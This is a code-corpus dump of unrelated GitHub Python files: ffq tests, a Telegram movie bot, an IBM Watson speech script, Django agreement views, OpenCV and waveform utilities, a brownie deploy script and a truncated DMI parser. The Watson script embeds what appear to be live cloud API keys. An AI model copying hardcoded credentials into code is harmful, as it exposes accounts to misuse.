ffq_gse.assert_called_once_with("GSE1")
def test_ffq_doi_no_geo(self):
with mock.patch("ffq.ffq.get_doi") as get_doi, mock.patch(
"ffq.ffq.search_ena_title"
) as search_ena_title, mock.patch(
"ffq.ffq.ncbi_search"
) as ncbi_search, mock.patch(
"ffq.ffq.ncbi_link"
) as ncbi_link, mock.patch(
"ffq.ffq.sra_ids_to_srrs"
) as sra_ids_to_srrs, mock.patch(
"ffq.ffq.ffq_run"
) as ffq_run:
get_doi.return_value = {"title": ["title"]}
search_ena_title.return_value = []
ncbi_search.return_value = ["PMID1"]
ncbi_link.side_effect = [[], ["SRA1"]]
sra_ids_to_srrs.return_value = ["SRR1"]
ffq_run.return_value = {"accession": "SRR1", "study": {"accession": "SRP1"}}
self.assertEqual(
[
{
"accession": "SRP1",
"runs": {
"SRR1": {
"accession": "SRR1",
"study": {"accession": "SRP1"},
}
},
}
],
ffq.ffq_doi("doi"),
)
get_doi.assert_called_once_with("doi")
search_ena_title.assert_called_once_with("title")
ncbi_search.assert_called_once_with("pubmed", "doi")
self.assertEqual(2, ncbi_link.call_count)
ncbi_link.assert_has_calls(
[
call("pubmed", "gds", "PMID1"),
call("pubmed", "sra", "PMID1"),
]
)
sra_ids_to_srrs.assert_called_once_with(["SRA1"])
ffq_run.assert_called_once_with("SRR1")
def test_version_string(self):
with patch("sys.argv", ["main", "--version"]):
out = StringIO()
sys.stdout = out
try:
main()
except SystemExit:
pass
output = out.getvalue()
self.assertEqual(output, f"main {__version__}\n")
def test_split_output(self):
# test the functionality of --split ensuring the output file is created
# and is a valid ffq json file
import tempfile
import json
import os
tempdir = tempfile.mkdtemp()
with patch("sys.argv", ["main", "--split", "-o", tempdir, "SRR1581006"]):
out = StringIO()
sys.stdout = out
try:
main()
except SystemExit:
pass
output = out.getvalue()
# Test that the STDOUT is empty (an not "null")
self.assertEqual(output, "")
# Test the output JSON file
file_json = json.load(open(os.path.join(tempdir, "SRR1581006.json")))
self.assertEqual(file_json["accession"], "SRR1581006")
| pachterlab/ffq | tests/test_ffq.py | test_ffq.py | py | 28,319 | python | en | code | 494 | github-code | 36 |
38045628445 | class Solution:
def findTheWinner(self, n: int, k: int) -> int:
stack = [i for i in range(n)]
start = 0
while len(stack)>1:
popped = (start+k-1)%len(stack)
stack.pop(popped)
start=popped
return stack[0]+1 | Navaneethp007/MissionImpossible | LeetCode/Find the Winner of the Circular Game.py | Find the Winner of the Circular Game.py | py | 334 | python | en | code | 10 | github-code | 36 |
12741468324 | from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, ParseMode
from telegram.ext import ConversationHandler
import random
def anketa_random_start(update, context):
update.message.reply_text(
f'Вы выбрали случайный фильм. Нажмите на кнопку "Получить фильм" и подождите немного, пока его подберу',
reply_markup=ReplyKeyboardMarkup(
[["Получить фильм"]],
one_time_keyboard=True,
resize_keyboard=True
)
)
return 'anketa_random_result'
movies_list = ['Красотка','Зеленая миля','Бетмен: начало','Форрест Гамп','Перл Харбор','Храброе сердце','Девчата']
def anketa_random_result(update, context):
random_movie = movies_list[random.randint(0,len(movies_list)-1)]
update.message.reply_text(
f'Ваш случайный фильм: {random_movie}. \nМожете попросить меня подобрать другой случайный фильм',
reply_markup=ReplyKeyboardMarkup([['Подобрать другой случайный фильм', 'Я нашел нужный фильм']],
one_time_keyboard=True,
resize_keyboard=True
)
)
movies_list.remove(random_movie)
return 'final_random'
def other_random(update, context):
if len(movies_list) > 0:
other_random_movie = movies_list[random.randint(0,len(movies_list)-1)]
update.message.reply_text(
f'Ваш следующий рандомный фильм: {other_random_movie}',
reply_markup=ReplyKeyboardMarkup([['Подобрать другой случайный фильм', 'Я нашел нужный фильм']],
one_time_keyboard=True,
resize_keyboard=True
)
)
movies_list.remove(other_random_movie)
return 'final_random'
else:
update.message.reply_text(
f'У меня закончились фильмы, вы маньяк', reply_markup=ReplyKeyboardMarkup([['Вернуться в начало']],
one_time_keyboard=True,
resize_keyboard=True
)
)
return ConversationHandler.END
def final_random(update, context):
update.message.reply_text(
f'Рад был помочь!', reply_markup=ReplyKeyboardMarkup([['Вернуться в начало']],
one_time_keyboard=True,
resize_keyboard=True
)
)
return ConversationHandler.END
def anketa_dontknow_random(update, context):
update.message.reply_text('Я вас не понимаю')
| bezrezen/kino_bot | anketa_random.py | anketa_random.py | py | 2,846 | python | ru | code | 1 | github-code | 36 |
36374178276 | from ibm_watson import TextToSpeechV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from playsound import playsound
import json
from watson_developer_cloud import VisualRecognitionV3
import json
import ibm_boto3
from ibm_botocore.client import Config, ClientError
visual_recognition = VisualRecognitionV3(
'2018-03-19',
iam_apikey='9txnOj7i6F1b8kxKdiIO96GYI7V_xxjE3v34uB_a1ERp')
authenticator = IAMAuthenticator('ZmfQSpS-m85wNBln69v_ojQDkFIlhJMIrQP3w5Y3hegP')
text_to_speech = TextToSpeechV1(
authenticator=authenticator
)
text_to_speech.set_service_url('https://api.au-syd.text-to-speech.watson.cloud.ibm.com/instances/3e6111c0-3fec-4fe0-92d2-61e9250fc06b')
with open('./food.jpg', 'rb') as image_file:
classes = visual_recognition.classify(
image_file,
threshold='0.6',
classifier_ids='food').get_result()
print(json.dumps(classes, indent=2))
speak=json.loads(json.dumps(classes))
x=speak['images']
for i in x:
for j in i['classifiers']:
k=j['classes']
for l in k:
m=l['class']
print(m)
with open('task.mp3', 'wb') as audio_file:
audio_file.write(
text_to_speech.synthesize(
m,
voice='en-US_AllisonVoice',
accept='audio/mp3'
).get_result().content)
playsound('task.mp3')
# Constants for IBM COS values
COS_ENDPOINT = "https://s3.jp-tok.cloud-object-storage.appdomain.cloud" # Current list avaiable at https://control.cloud-object-storage.cloud.ibm.com/v2/endpoints
COS_API_KEY_ID = "Rz4Bn5WfJ3NHLyoF3rQesiKjG6lXo-k8vnVBm3-rm_2z" # eg "W00YiRnLW4a3fTjMB-odB-2ySfTrFBIQQWanc--P3byk"
COS_AUTH_ENDPOINT = "https://iam.cloud.ibm.com/identity/token"
COS_RESOURCE_CRN = "crn:v1:bluemix:public:cloud-object-storage:global:a/d27055cdf70a4c8a82a0891135504b4c:be3efa61-d84f-4161-b654-255da6f7b06f::" # eg "crn:v1:bluemix:public:cloud-object-storage:global:a/3bf0d9003abfb5d29761c3e97696b71c:d6f04d83-6c4f-4a62-a165-696756d63903::"
# Create resource
cos = ibm_boto3.resource("s3",
ibm_api_key_id=COS_API_KEY_ID,
ibm_service_instance_id=COS_RESOURCE_CRN,
ibm_auth_endpoint=COS_AUTH_ENDPOINT,
config=Config(signature_version="oauth"),
endpoint_url=COS_ENDPOINT
)
def multi_part_upload(bucket_name, item_name, file_path):
try:
print("Starting file transfer for {0} to bucket: {1}\n".format(item_name, bucket_name))
# set 5 MB chunks
part_size = 1024 * 1024 * 5
# set threadhold to 15 MB
file_threshold = 1024 * 1024 * 15
# set the transfer threshold and chunk size
transfer_config = ibm_boto3.s3.transfer.TransferConfig(
multipart_threshold=file_threshold,
multipart_chunksize=part_size
)
# the upload_fileobj method will automatically execute a multi-part upload
# in 5 MB chunks for all files over 15 MB
with open(file_path, "rb") as file_data:
cos.Object(bucket_name, item_name).upload_fileobj(
Fileobj=file_data,
Config=transfer_config
)
print("Transfer for {0} Complete!\n".format(item_name))
except ClientError as be:
print("CLIENT ERROR: {0}\n".format(be))
except Exception as e:
print("Unable to complete multi-part upload: {0}".format(e))
multi_part_upload("mohammadansari2", "ansari.mp3", "task.mp3")
| Ansari369/IoT-projects | taskapp.py | taskapp.py | py | 3,478 | python | en | code | 0 | github-code | 36 |
541817983 | class Map:
x = 0
y = 0
map = []
def __init__(self):
self.create_map()
self.show_map()
def create_map(self):
self.x = int(input('Введите ширину карты'))
self.y = int(input('Введите длину карты'))
for i in range(0, self.x):
self.map.append([])
for j in range(0, self.y):
self.map[i].append(0)
def show_map(self):
st = ''
for i in self.map:
for j in i:
st += str(j) + ' '
else:
print(st)
st = ''
| gruzchik17/game | map.py | map.py | py | 649 | python | en | code | 1 | github-code | 36 |
72447111784 | from base64 import b64decode
import invoicegen.settings
import settings.helper
from django.contrib.auth.decorators import login_required, permission_required
from django.core.files.base import ContentFile
from django.http import JsonResponse
from django.views import View
from django.shortcuts import *
from django.utils import timezone
from django.utils.crypto import get_random_string
from django_tables2 import RequestConfig
from .tables import AgreementTable, AgreementTextTable
from .helper import replace_text
from .forms import AgreementForm, AgreementTextForm
from .models import *
@login_required
@permission_required('agreements.view_agreement')
def agreement_index(request):
agreements = AgreementTable(Agreement.objects.all())
RequestConfig(request).configure(agreements)
return render(request, 'agreements/agreements.html', {'agreements': agreements})
@login_required
@permission_required('agreements.view_agreementtext')
def agreementtext_index(request):
model_agreements = AgreementTextTable(AgreementText.objects.all())
RequestConfig(request).configure(model_agreements)
return render(request, 'agreements/agreementtext/agreementtext_index.html',
{'model_agreements': model_agreements})
class AddAgreement(View):
def post(self, request):
agreement = Agreement()
agreement_form = AgreementForm(request.POST, instance=agreement)
if agreement_form.is_valid():
data = agreement_form.cleaned_data
agreement_form.save(commit=False)
agreement.created = timezone.now()
agreement.url = get_random_string(length=32)
agreement.company = data['company']
agreement.save()
for article in data['article_concerned']:
agreement.article_concerned.add(article)
agreement.save()
request.session['toast'] = 'Overeenkomst toegevoegd'
return redirect(reverse('new_agreement_step_two', kwargs={'agreement_id': agreement.id}))
else:
return render(request, 'agreements/new_edit_agreement.html',
{'toast': 'Formulier onjuist ingevuld', 'form': agreement_form})
def get(self, request):
form = AgreementForm()
articles = Product.objects.filter(done=False)
return render(request, 'agreements/new_edit_agreement.html', {'form': form, 'articles': articles})
class AddAgreementStepTwo(View):
def post(self, request, agreement_id):
agreement = Agreement.objects.get(id=agreement_id)
variables = self.agreement_variables(agreement_id)
key_value_list = {}
for variable in variables.all():
post_name = 'variable' + str(variable.id)
value = request.POST[post_name]
if variable.name:
key_value_list[variable.name] = value
agreement.agreement_text_copy = replace_text(agreement.agreement_text.text, agreement.article_concerned.all(),
agreement.company, key_value_list)
agreement.save()
request.session['toast'] = 'Overeenkomst toegevoegd'
return redirect(reverse('agreement_index'))
def get(self, request, agreement_id):
variables = self.agreement_variables(agreement_id)
return render(request, 'agreements/new_agreement_step_two.html', {'variables': variables, 'agreement_id': agreement_id})
def agreement_variables(self, agreement_id):
agreement = Agreement.objects.get(id=agreement_id)
variables = agreement.agreement_text.variables
return variables
def view_agreement(request, url):
agreement = Agreement.objects.get(url=url)
agreement.complete_url = 'https://' + invoicegen.settings.ALLOWED_HOSTS[
0] + '/overeenkomsten/ondertekenen/' + agreement.url
agreement.full_name = settings.helper.get_user_fullname()
if request.method == 'GET':
return render(request, 'agreements/view_sign_agreement.html', {'agreement': agreement})
@login_required
@permission_required('agreements.change_agreement')
def sign_agreement_contractor(request, url):
agreement = Agreement.objects.get(url=url)
if request.method == 'POST':
if 'signature' in request.POST and 'signee_name' in request.POST and request.POST[
'signee_name'].strip() and request.POST['signee_name'].strip():
image_data = request.POST['signature'].split(',')
image_data = b64decode(image_data[1])
now = timezone.now()
file_name = 'signature-of-' + request.POST['signee_name'] + '-at-' + str(now) + '.png'
agreement.signature_file_contractor = ContentFile(image_data, file_name)
agreement.signed_by_contractor_at = now
agreement.signed_by_contractor = True
agreement.save()
agreement.complete_url = 'https://' + invoicegen.settings.ALLOWED_HOSTS[
0] + '/overeenkomsten/ondertekenen/' + agreement.url
return JsonResponse({'success': True})
else:
return JsonResponse({'error': 'Naam of handtekening ontbreekt'})
def sign_agreement_client(request, url):
agreement = Agreement.objects.get(url=url)
if request.method == 'POST':
if 'signature' in request.POST and 'signee_name' in request.POST and request.POST[
'signee_name'].strip() and request.POST['signee_name'].strip():
image_data = request.POST['signature'].split(',')
image_data = b64decode(image_data[1])
now = timezone.now()
file_name = 'signature-of-' + request.POST['signee_name'] + '-at-' + str(now) + '.png'
agreement.signature_file_client = ContentFile(image_data, file_name)
agreement.signed_by_client_at = now
agreement.signed_by_client = True
agreement.save()
return JsonResponse({'success': True})
else:
return JsonResponse({'error': 'Naam of handtekening ontbreekt'})
def send_push_notification_signed_agreement():
pass
@login_required
@permission_required('agreements.delete_agreement')
def delete_agreement(request, agreement_id=-1):
try:
agreement_to_delete = Agreement.objects.get(id=agreement_id)
agreement_to_delete.delete()
request.session['toast'] = 'Overeenkomst verwijderd'
return redirect(reverse('agreement_index'))
except:
request.session['toast'] = 'Verwijderen mislukt'
return redirect(reverse('agreement_index'))
@login_required
@permission_required('agreements.delete_agreementtext')
def delete_model_agreement(request, model_agreement_text_id=-1):
try:
agreement_text_to_delete = AgreementText.objects.get(id=model_agreement_text_id)
agreement_text_to_delete.delete()
request.session['toast'] = 'Modelvereenkomst verwijderd'
return redirect(reverse('agreementtext_index'))
except:
request.session['toast'] = 'Verwijderen mislukt'
return redirect(reverse('agreementtext_index'))
class EditAgreementText(View):
def post(self, request, model_agreement_id):
agreementtext = AgreementText.objects.get(id=model_agreement_id)
form = AgreementTextForm(request.POST, instance=agreementtext)
if form.is_valid():
form.save()
variable_list = get_extra_variables(request)
agreementtext.variables.add(*variable_list)
agreementtext.save()
return redirect(reverse('agreementtext_index'))
else:
return render(request, 'agreements/agreementtext/edit_agreementtext.html',
{'form': form, 'edit': True, 'error': form.errors,
'model_agreement_id': agreementtext.id})
def get(self, request, model_agreement_id):
model_agreement = AgreementText.objects.get(id=model_agreement_id)
form = AgreementTextForm(instance=model_agreement)
return render(request, 'agreements/agreementtext/edit_agreementtext.html',
{'form': form, 'model_agreement_id': model_agreement.id})
class AddAgreementText(View):
def post(self, request):
agree_text = AgreementText()
agree_text_form = AgreementTextForm(request.POST, instance=agree_text)
if agree_text_form.is_valid():
agree_text_form.save(commit=False)
agree_text.edited_at = timezone.now()
agree_text.save()
variable_list = get_extra_variables(request)
agree_text.variables.add(*variable_list)
agree_text.save()
request.session['toast'] = 'Modelovereenkomst toegevoegd'
return redirect(reverse('agreementtext_index'))
else:
return render(request, 'agreements/agreementtext/new_agreementtext.html',
{'toast': 'Formulier onjuist ingevuld', 'form': agree_text_form,
'error': agree_text_form.errors})
def get(self, request):
form = AgreementTextForm()
return render(request, 'agreements/agreementtext/new_agreementtext.html', {'form': form})
def get_extra_variables(request):
var_obj = request.POST['var_name1']
if var_obj != '':
counter = 1
variable_list = []
while var_obj is not None:
desc_variable_name = 'desc' + str(counter)
desc = request.POST[desc_variable_name]
variable = AgreementTextVariable(name=var_obj, description=desc)
variable.save()
variable_list.append(variable)
counter += 1
key_variable_name = 'var_name' + str(counter)
if key_variable_name in request.POST:
var_obj = request.POST[key_variable_name]
else:
var_obj = None
return variable_list
return [] | jlmdegoede/Invoicegen | agreements/views.py | views.py | py | 9,931 | python | en | code | 0 | github-code | 36 |
42246125387 | """
Module with class that wraps OpenCV based detectors and descriptors.
Allows performing Non-Maximum suppression based on keypoints response, top-response keypoints filtering,
descriptors normalization.
"""
from typing import Union, Iterable, Tuple, Optional
import cv2
import numpy as np
from scipy.spatial import KDTree
class OpenCVFeatures:
def __init__(self, features: cv2.Feature2D, max_keypoints: int = -1,
nms_diameter: float = 9., normalize_desc: bool = True, root_norm: bool = True,
laf_scale_mr_size: Optional[float] = 6.0):
self.features = features
self.max_keypoints = max_keypoints
self.nms_radius = nms_diameter / 2
self.normalize_desc = normalize_desc
self.root_norm = root_norm
self.laf_scale_mr_size = laf_scale_mr_size
@staticmethod
def normalize_descriptors(descriptors: np.ndarray, root_norm: bool = True) -> np.ndarray:
"""
Normalize descriptors.
If root_norm=True apply RootSIFT-like normalization, else regular L2 normalization.
Args:
descriptors: array (N, 128) with unnormalized descriptors
root_norm: boolean flag indicating whether to apply RootSIFT-like normalization
Returns:
descriptors: array (N, 128) with normalized descriptors
"""
descriptors = descriptors.astype(np.float32)
if root_norm:
# L1 normalize
norm = np.linalg.norm(descriptors, ord=1, axis=1, keepdims=True)
descriptors /= norm
# take square root of descriptors
descriptors = np.sqrt(descriptors)
else:
# L2 normalize
norm = np.linalg.norm(descriptors, ord=2, axis=1, keepdims=True)
descriptors /= norm
return descriptors
@staticmethod
def lafs_from_opencv_kpts(kpts: Iterable[cv2.KeyPoint],
mr_size: float = 6.0,
with_resp: bool = False) -> Union[np.ndarray, Tuple[np.ndarray, np.ndarray]]:
"""
Convert OpenCV keypoint to Local Affine Frames.
Adapted from kornia_moons for numpy arrays.
https://github.com/ducha-aiki/kornia_moons/blob/6aa7bdbe1879303bd9bf35494b383e4f959a1135/kornia_moons/feature.py#L60
Args:
kpts: iterable of OpenCV keypoints
mr_size: multiplier for keypoint size
with_resp: flag indicating whether to return responses
Returns:
lafs: array (N, 2, 3) of local affine frames made from keypoints
responses (optional): array (N,) of responses corresponding to lafs
"""
xy = np.array([k.pt for k in kpts], dtype=np.float32)
scales = np.array([mr_size * k.size for k in kpts], dtype=np.float32)
angles = np.array([k.angle for k in kpts], dtype=np.float32)
# if angles are not set, make them 0
if np.allclose(angles, -1.):
angles = np.zeros_like(scales, dtype=np.float32)
angles = np.deg2rad(-angles)
n = xy.shape[0]
lafs = np.empty((n, 2, 3), dtype=np.float32)
lafs[:, :, 2] = xy
s_cos_t = scales * np.cos(angles)
s_sin_t = scales * np.sin(angles)
lafs[:, 0, 0] = s_cos_t
lafs[:, 0, 1] = s_sin_t
lafs[:, 1, 0] = -s_sin_t
lafs[:, 1, 1] = s_cos_t
if with_resp:
resp = np.array([k.response for k in kpts], dtype=np.float32)
return lafs, resp
else:
return lafs
def detect_and_compute(self, image: np.array) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Detect keypoint with OpenCV-based detector and apply OpenCV-based description.
Args:
image: array representation of grayscale image of uint8 data type
Returns:
lafs: array (N, 2, 3) of local affine frames created from detected keypoints
scores: array (N,) of corresponding detector responses
descriptors: array (N, 128) of descriptors
"""
kpts, scores, descriptors = detect_kpts_opencv(self.features, image, self.nms_radius, self.max_keypoints,
describe=True)
lafs = self.lafs_from_opencv_kpts(kpts, mr_size=self.laf_scale_mr_size, with_resp=False)
if self.normalize_desc:
descriptors = self.normalize_descriptors(descriptors, self.root_norm)
return lafs, scores, descriptors
def __repr__(self):
return f'OpenCVFeatures(features={type(self.features)})'
def detect_kpts_opencv(features: cv2.Feature2D, image: np.ndarray, nms_radius: float, max_keypoints: int,
describe: bool = False) -> np.ndarray:
"""
Detect keypoints using OpenCV Detector. Optionally, perform NMS and filter top-response keypoints.
Optionally perform description.
Args:
features: OpenCV based keypoints detector and descriptor
image: Grayscale image of uint8 data type
nms_radius: radius of non-maximum suppression. If negative, skip nms
max_keypoints: maximum number of keypoints to keep based on response. If negative, keep all
describe: flag indicating whether to simultaneously compute descriptors
Returns:
kpts: 1D array of detected cv2.KeyPoint
"""
if describe:
kpts, descriptors = features.detectAndCompute(image, None)
else:
kpts = features.detect(image, None)
kpts = np.array(kpts)
responses = np.array([k.response for k in kpts], dtype=np.float32)
kpts_pt = np.array([k.pt for k in kpts], dtype=np.float32)
if nms_radius > 0:
nms_mask = nms_keypoints(kpts_pt, responses, nms_radius)
else:
nms_mask = np.ones((kpts_pt.shape[0],), dtype=bool)
responses = responses[nms_mask]
kpts = kpts[nms_mask]
if max_keypoints > 0:
top_score_idx = np.argpartition(-responses, min(max_keypoints, len(responses) - 1))[:max_keypoints]
else:
# select all
top_score_idx = ...
if describe:
return kpts[top_score_idx], responses[top_score_idx], descriptors[nms_mask][top_score_idx]
else:
return kpts[top_score_idx], responses[top_score_idx]
def nms_keypoints(kpts: np.ndarray, responses: np.ndarray, radius: float) -> np.ndarray:
# TODO: add approximate tree
kd_tree = KDTree(kpts)
sorted_idx = np.argsort(-responses)
kpts_to_keep_idx = []
removed_idx = set()
for idx in sorted_idx:
# skip point if it was already removed
if idx in removed_idx:
continue
kpts_to_keep_idx.append(idx)
point = kpts[idx]
neighbors = kd_tree.query_ball_point(point, r=radius)
# Variable `neighbors` contains the `point` itself
removed_idx.update(neighbors)
mask = np.zeros((kpts.shape[0],), dtype=bool)
mask[kpts_to_keep_idx] = True
return mask
| ucuapps/OpenGlue | models/features/opencv/base.py | base.py | py | 6,977 | python | en | code | 304 | github-code | 36 |
9601977492 | from pydub import AudioSegment
import glob
from PIL import Image, ImageDraw
import os
import multiprocessing
import tqdm
import json
import numpy as np
in_path = '/Volumes/AGENTCASHEW/sound-effects-output/'
def process_clip(wave_file_name):
print(wave_file_name)
if os.path.isdir(wave_file_name+'/waveform'):
return None
meta = json.load(open(wave_file_name+'/meta.json'))
print(meta)
audio = AudioSegment.from_file(wave_file_name+'/audio.mp3')
data = np.fromstring(audio._data, np.int16)
fs = audio.frame_rate
BARS = 600
BAR_HEIGHT = 120
LINE_WIDTH = 1
length = len(data)
RATIO = length/BARS
count = 0
maximum_item = 0
max_array = []
highest_line = 0
for d in data:
if count < RATIO:
count = count + 1
if abs(d) > maximum_item:
maximum_item = abs(d)
else:
max_array.append(maximum_item)
if maximum_item > highest_line:
highest_line = maximum_item
maximum_item = 0
count = 1
line_ratio = highest_line/BAR_HEIGHT
print(meta['type'],len(max_array))
# each tick is x number of milliseconds
tick = int(meta['length']/len(max_array))
print('tick is',tick)
im = Image.new('RGBA', (BARS * LINE_WIDTH, BAR_HEIGHT), (255, 255, 255, 0))
draw = ImageDraw.Draw(im)
current_x = 1
for item in max_array:
item_height = item/line_ratio
current_y = (BAR_HEIGHT - item_height)/2
draw.line((current_x, current_y, current_x, current_y + item_height), fill=(158, 158, 158), width=0)
current_x = current_x + LINE_WIDTH
os.mkdir(wave_file_name+'/waveform')
current_x = 1
for idx, item in enumerate(max_array):
item_height = item/line_ratio
current_y = (BAR_HEIGHT - item_height)/2
draw.line((current_x, current_y, current_x, current_y + item_height), fill=(255, 87, 34), width=0)
current_x = current_x + LINE_WIDTH
im.save(f"{wave_file_name}/waveform/{idx}.png")
the_pool = multiprocessing.Pool(8)
path, dirs, files = os.walk(in_path).__next__()
for result in tqdm.tqdm(the_pool.imap_unordered(process_clip, glob.iglob(in_path+'*')), total=len(files)):
pass
| thisismattmiller/sound-effect-bot | build_waveform_frames.py | build_waveform_frames.py | py | 2,125 | python | en | code | 0 | github-code | 36 |
34084783842 | from pathlib import Path
from brownie import Strategy, accounts, config, network, project, web3
from brownie.network.gas.strategies import GasNowStrategy
from brownie.network import gas_price
from eth_utils import is_checksum_address
API_VERSION = config["dependencies"][0].split("@")[-1]
Vault = project.load(
Path.home() / ".brownie" / "packages" / config["dependencies"][0]
).Vault
#1INCH token
WANT_TOKEN = "0x111111111117dC0aa78b770fA6A738034120C302"
STRATEGIST_ADDR = "0xAa9E20bAb58d013220D632874e9Fe44F8F971e4d"
#Deployer as governance
GOVERNANCE = STRATEGIST_ADDR
#Rewards to deployer,we can change it to yearn governance after approval
REWARDS = STRATEGIST_ADDR
#Set gas price as fast
gas_price(62 * 1e9)
def get_address(msg: str) -> str:
while True:
val = input(msg)
if is_checksum_address(val):
return val
else:
addr = web3.ens.address(val)
if addr:
print(f"Found ENS '{val}' [{addr}]")
return addr
print(f"I'm sorry, but '{val}' is not a checksummed address or ENS")
def main():
print(f"You are using the '{network.show_active()}' network")
dev = accounts.load("dev")
print(f"You are using: 'dev' [{dev.address}]")
if input("Is there a Vault for this strategy already? y/[N]: ").lower() == "y":
vault = Vault.at(get_address("Deployed Vault: "))
assert vault.apiVersion() == API_VERSION
else:
#Deploy vault
vault = Vault.deploy({"from": dev})
vault.initialize(
WANT_TOKEN,#OneInch token as want token
GOVERNANCE,#governance
REWARDS,#rewards
"",#nameoverride
"",#symboloverride
{"from": dev}
)
print(API_VERSION)
assert vault.apiVersion() == API_VERSION
print(
f"""
Strategy Parameters
api: {API_VERSION}
token: {vault.token()}
name: '{vault.name()}'
symbol: '{vault.symbol()}'
"""
)
if input("Deploy Strategy? [y]/n: ").lower() == "n":
strategy = Strategy.at(get_address("Deployed Strategy: "))
else:
strategy = Strategy.deploy(vault, {"from": dev}, publish_source=True)
#add strat to vault
vault.addStrategy(strategy, 10_000, 0, 0, {"from": dev})
#Set deposit limit to 5000 1INCH tokens
vault.setDepositLimit(5000 * 1e18)
| akshaynexus/BoringDAOStrats | scripts/deploy.py | deploy.py | py | 2,398 | python | en | code | 2 | github-code | 36 |
3473904633 | import copy
import ctypes
import os
import pprint
import struct
import sys
from sys_utils import run, FIND_LIBRARY_CMD, MEMKIND_LIBRARY
RUNNING_UT = False
MESSAGE_UNAVAILABLE = "Not Available"
MESSAGE_AVAILABLE = "Available"
MESSAGE_NOT_RESERVED = "Unable to reserve {0} memory"
# dmi_sysfs global variables
DMI_SYSFS_ROOT = "/sys/firmware/dmi/entries"
DMI_FILENAME = DMI_SYSFS_ROOT + "/{0}/raw"
DMI_GROUP_ASSOCIATIONS_TYPE = "14-{0}"
DMI_GROUP_STRING = "Group: "
DMI_SYS_KNL_GROUP_NAME = "Knights Landing Information"
DMI_SYS_KNM_GROUP_NAME = "Knights Mill Information"
DMI_SYS_GENERAL_INFO_TYPE = "{0}-0"
# smbios enum values
TYPE_16_LOCATION_OTHER = 0x01
TYPE_16_LOCATION_SYSTEM = 0x03
TYPE_16_USE_SYSTEM = 0x03
TYPE_16_USE_CACHE = 0x07
TYPE_17_FORM_FACTOR_CHIP = 0x05
TYPE_17_TYPE_DETAIL_CACHE_DRAM = 0x800
class DMITable(object):
"""Base class for Table Type objects
"""
def __init__(self, table_type):
self.table_type = table_type
self.entries = list()
self._process_dmi_table()
def __iter__(self):
for entry in self.entries:
yield entry
def __len__(self):
return len(self.entries)
def _process_dmi_table(self):
"""Function that reads dmi table information.
"""
fd = None
table_file_format = "{0}-".format(os.path.join(DMI_SYSFS_ROOT, str(self.table_type)))
for top_dir, _, _ in os.walk(DMI_SYSFS_ROOT):
if not top_dir.startswith(table_file_format):
continue
file_name = os.path.join(top_dir, "raw")
try:
fd = os.open(file_name, os.O_RDONLY)
self._process_dmi_file(fd)
except (OSError, NameError) as e:
err_msg = "Error processing DMI Type {0}: {1}\n".format(self.table_type, e)
raise DMIException(err_msg)
except:
err_msg = "Unknown Error while processing DMI Type {0}: {1}\n".format(self.table_type, sys.exc_info()[0])
raise DMIException(err_msg)
finally:
if fd:
os.close(fd)
def _process_dmi_file(self, fd):
"""Function needs to be implemented by child classes
"""
raise NotImplementedError
def _get_strings_info(self, fd, length):
"""Function that gathers the strings on the smbios table being parsed
According to SMBIOS Spec: The strings are a series of characters
followed by the null char (value 0). If two
null chars are read, then there are no more
strings for the table.
"""
strings = ["",]
chars = list()
null_found = False
os.lseek(fd, length, os.SEEK_SET)
while True:
char = struct.unpack('1B', os.read(fd, 1))[0]
if not char:
if chars:
strings.append("".join(chars))
chars[:] = []
if null_found:
break;
null_found = True
continue;
null_found = False
chars.append(chr(char))
return strings
class DMITableType16(DMITable):
"""Class that reads DMI Table Type 16
"""
def __init__(self):
DMITable.__init__(self, 16)
def __str__(self):
header = "\tTable Type 16 Content (Num Ele: {0}): \n".format(len(self.entries))
footer = "\tEnding table Type 16.\n"
contents =list()
for entry in self.entries:
entry_contents = (
"Type: {0}\n"
"Length: {1}\n"
"Handle: {2}\n"
"Location: {3}\n"
"Use: {4}\n"
"Mem Err Corr: {5}\n"
"MaxCap: {6}\n"
"Mem Err Inf: {7}\n"
"Num Mem Dev: {8}\n"
"Ext Max Cap: {9}\n\n").format(entry["table_type"],
hex(entry["lenght"]),
hex(entry["handle"]),
hex(entry["location"]),
hex(entry["use"]),
hex(entry["mem_err_corr"]),
entry["max_cap"],
hex(entry["mem_err_inf"]),
entry["num_mem_dev"],
entry["ext_max_cap"])
contents.append(entry_contents)
contents_str = "".join(contents)
output = "{0} {1} {2}".format(header, contents_str, footer)
return output
def _process_dmi_file(self, fd):
""" Function that parses information from DMI File Type 16
"""
os.lseek(fd, 0, os.SEEK_SET)
table_type = struct.unpack('1B', os.read(fd, 1))[0]
length = struct.unpack('1B', os.read(fd, 1))[0]
handle = struct.unpack('1H', os.read(fd, 2))[0]
location = struct.unpack('1B', os.read(fd, 1))[0]
use = struct.unpack('1B', os.read(fd, 1))[0]
mem_err_corr = struct.unpack('1B', os.read(fd, 1))[0]
max_cap = struct.unpack('1I', os.read(fd, 4))[0]
mem_err_inf = struct.unpack('1H', os.read(fd, 2))[0]
num_mem_dev = struct.unpack('1H', os.read(fd, 2))[0]
ext_max_cap = struct.unpack('1Q', os.read(fd, 8))[0]
strings = self._get_strings_info(fd, length)
self.entries.append({"table_type": table_type,
"lenght": length,
"handle": handle,
"location": location,
"use": use,
"mem_err_corr": mem_err_corr,
"max_cap": max_cap, # In KB
"mem_err_inf": mem_err_inf,
"num_mem_dev": num_mem_dev, # if value = 0xFFFE no error information
"ext_max_cap": ext_max_cap}) # Only available if max_cap = 0x80000000. in B
class DMITableType17(DMITable):
"""Class that reads DMI Table Type 17
"""
def __init__(self):
DMITable.__init__(self, 17)
def __str__(self):
header = "\tTable Type 17 Content (Num Ele: {0}): \n".format(len(self.entries))
footer = "\tEnding table Type 17.\n"
contents = list()
for entry in self.entries:
entry_contents = (
"Type: {0}\n"
"Length: {1}\n"
"Handle: {2}\n"
"Phys Memory Loc: {3}\n"
"Mem Error Inf: {4}\n"
"Total Width: {5}\n"
"Data Width: {6}\n"
"Size: {7}\n"
"Form Factor: {8}\n"
"Device Set: {9}\n"
"Device Locator: {10}\n"
"Bank Locator: {11}\n"
"Memory Type: {12}\n"
"Type Detail: {13}\n"
"Speed: {14}\n"
"Manufacturer: {15}\n"
"Serial Number: {16}\n"
"Asset Tag: {17}\n"
"Part Number: {18}\n"
"Attributes: {19}\n"
"Ext Size: {20}\n"
"Conf Memory Speed: {21}\n"
"Min Volt: {22}\n"
"Max Volt: {23}\n"
"Conf Volt: {24}\n\n").format(entry["table_type"],
